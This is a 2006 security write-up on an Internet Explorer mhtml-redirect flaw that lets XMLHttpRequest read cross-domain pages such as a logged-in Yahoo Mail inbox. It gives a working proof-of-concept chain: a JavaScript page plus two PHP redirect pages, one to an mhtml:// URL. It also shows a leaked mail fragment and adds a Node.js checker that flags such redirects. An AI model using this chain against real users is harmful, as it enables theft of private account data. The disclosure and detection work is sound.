IE mhtml redirection vulnerability exploitation method
Author: yunshu_[At]_ph4nt0m.org
Team: http://www.ph4nt0m.org
Date: 2006-05-11
This vulnerability is primarily an information disclosure; see http://secunia.com/advisories/19738/ for the detailed description. To keep clients safe, XMLHttpRequest cannot fetch data across domains. IE, however, has a security flaw: by using an mhtml redirect on the server side, XMLHttpRequest can be made to fetch sensitive data across domains. In my test, after I had logged in to Yahoo Mail, the vulnerability let me successfully retrieve my mail data. The advisory says IE 6.0 is affected; using IE7 I was attacked just the same.
Below is the main page, which requests a page on its own domain via XMLHttpRequest. (If this is changed to access another domain directly, an access denied error appears.)
<html>
<head>
<script language="JavaScript">
// Start XML HTTP Request Object
var request = InitXMLHttpRequest();

function StartTest()
{
    document.getElementById("result").innerHTML = "init ok<br />";
    document.getElementById("result").innerHTML += "begin open<br /> ";
    // Open the request against a page on this page's own domain
    request.open('GET', 'http://www.icylife.net/valu1.php', true);
    document.getElementById("result").innerHTML += "begin send<br /> ";
    request.onreadystatechange = WhenDone;
    // Make the request
    request.send();
}

// Function for initialising the XMLHttpRequest
function InitXMLHttpRequest()
{
    var request;
    try
    {
        request = new XMLHttpRequest();
    }
    catch (trymicrosoft)
    {
        try
        {
            request = new ActiveXObject("Msxml2.XMLHTTP");
        }
        catch (othermicrosoft)
        {
            try
            {
                request = new ActiveXObject("Microsoft.XMLHTTP");
            }
            catch (failed)
            {
                request = false;
            }
        }
    }
    // Initialised?
    if ( !request )
    {
        alert("Due to limitations of your browser you will not be able to use this page.");
    }
    return request;
}

// Called on every state change; shows the response body once it is complete
function WhenDone( )
{
    if ( request.readyState == 4 )
    {
        document.getElementById("result").innerHTML = request.responseText;
    }
}
</script>
</head>
<body>
<b>Start the test:</b><br>
<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now</font></a></div>
<br />
<div id="result"></div>
</body>
</html>
Here is the second page, which performs the mhtml redirect; the code is very simple.
<?php
header("Location: mhtml://http://icylife.net/valu2.php");
?>
Then the third page, which redirects to Yahoo Mail.
<?php
header("Location: http://mail.yahoo.com.cn/");
?>
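The three pages above form a single redirect chain, and the telltale step is the second one: an HTTP 3xx whose Location header names an mhtml: URL wrapping another URL. As an added example that is not part of the original post, here is a Node.js check that a proxy operator or log reviewer could run over raw HTTP responses to flag such redirects (and any other non-http(s) redirect scheme) before they reach a browser. The sample responses are constructed to mirror the chain in the post; the function names are my own and not from any library.

```javascript
// Added example (not from the original post): flag HTTP redirects whose Location
// header uses the mhtml: scheme, or any scheme other than http/https, or nests a
// second URL after the scheme. Input is raw response text; runs under Node.js.

const SAFE_SCHEMES = new Set(["http:", "https:"]);

// Parse the status line and header block of a raw HTTP response string.
function parseResponse(raw) {
  const lines = raw.split(/\r?\n/);
  const status = parseInt(lines[0].split(" ")[1], 10);
  const headers = {};
  for (const line of lines.slice(1)) {
    if (line === "") break;                     // blank line ends the header block
    const idx = line.indexOf(":");
    if (idx === -1) continue;                   // not a header line; ignore
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { status, headers };
}

// Classify one Location value. Returns { verdict, scheme, reason }.
function classifyRedirect(location) {
  // Take the scheme token by hand: new URL("mhtml://http://x") would parse and
  // report "http" as the host, hiding exactly the thing we want to see.
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(location);
  if (!m) {
    return { verdict: "relative", scheme: null, reason: "scheme-less (same-origin) redirect" };
  }
  const scheme = m[1].toLowerCase() + ":";
  if (scheme === "mhtml:") {
    return { verdict: "block", scheme, reason: "mhtml: redirect target (Secunia 19738 pattern)" };
  }
  if (!SAFE_SCHEMES.has(scheme)) {
    return { verdict: "block", scheme, reason: "non-http(s) redirect scheme" };
  }
  // A second "scheme://" right after the first is never a legitimate target.
  if (/^[a-z]+:\/\/[a-z]+:\/\//i.test(location)) {
    return { verdict: "block", scheme, reason: "nested URL inside redirect target" };
  }
  return { verdict: "allow", scheme, reason: "ordinary http(s) redirect" };
}

// Audit a batch of raw responses; returns one finding per redirect response.
function auditResponses(rawResponses) {
  const findings = [];
  for (const raw of rawResponses) {
    const { status, headers } = parseResponse(raw);
    if (status < 300 || status > 399 || !headers.location) continue;
    findings.push({ location: headers.location, ...classifyRedirect(headers.location) });
  }
  return findings;
}

// Constructed sample responses modelled on the pages in the post (not real captures).
const SAMPLE_RESPONSES = [
  "HTTP/1.1 302 Found\r\nLocation: mhtml://http://icylife.net/valu2.php\r\nContent-Length: 0\r\n\r\n",
  "HTTP/1.1 302 Found\r\nLocation: http://mail.yahoo.com.cn/\r\nContent-Length: 0\r\n\r\n",
  "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>",
];

for (const f of auditResponses(SAMPLE_RESPONSES)) {
  console.log(`${f.verdict.toUpperCase()}  ${f.location}  (${f.reason})`);
}
```

Running it prints BLOCK for the mhtml: hop and ALLOW for the plain http hop; the 200 response is skipped because only 3xx responses carrying a Location header are examined. The scheme is extracted with a regular expression rather than the URL parser on purpose: a nested target like mhtml://http://host/ is exactly what a lenient parser would normalise away.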
After I had logged in to mail, a fragment of the attack result looked like this:
<html>
<head><META HTTP-EQUIV="content-type" CONTENT="text/html; charset=gb2312">
<title>
Yahoo!电邮 - wustyunshu@yahoo.com.cn</title>
<script type="text/javascript">
<!--
if(typeof top.frames["wmailmain"] != "undefined") window.open("http://mail.yahoo.com", "_top");
// -->
</script>
<noscript>
<META HTTP-EQUIV=Refresh CONTENT="0; URL=/ym/login?nojs=1">
</noscript>